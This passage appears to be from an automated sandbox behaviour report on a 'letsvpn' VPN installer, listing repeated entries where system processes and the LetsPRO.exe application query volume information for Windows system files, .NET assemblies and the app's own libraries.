Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\ProgramData\letsvpn-latest.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\letsvpn-latest.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Queries volume information: C:\Program Files (x86)\letsvpn\driver\tap0901.cat VolumeInformation
Source: C:\Windows\System32\drvinst.exe	Queries volume information: C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\tap0901.cat VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\Utils.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\log4net.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsVPNDomainModel.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\CommunityToolkit.Mvvm.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.InteropServices.RuntimeInformation.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Memory.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.CompilerServices.Unsafe.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Buffers.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsVPNInfraStructure.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.Analytics.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.batteries_v2.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.core.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.provider.dynamic_cdecl.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.nativelibrary.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\Hardcodet.Wpf.TaskbarNotification.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Http.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\PusherClient.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\WebSocket4Net.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\SuperSocket.Clientuser.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLite-net.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
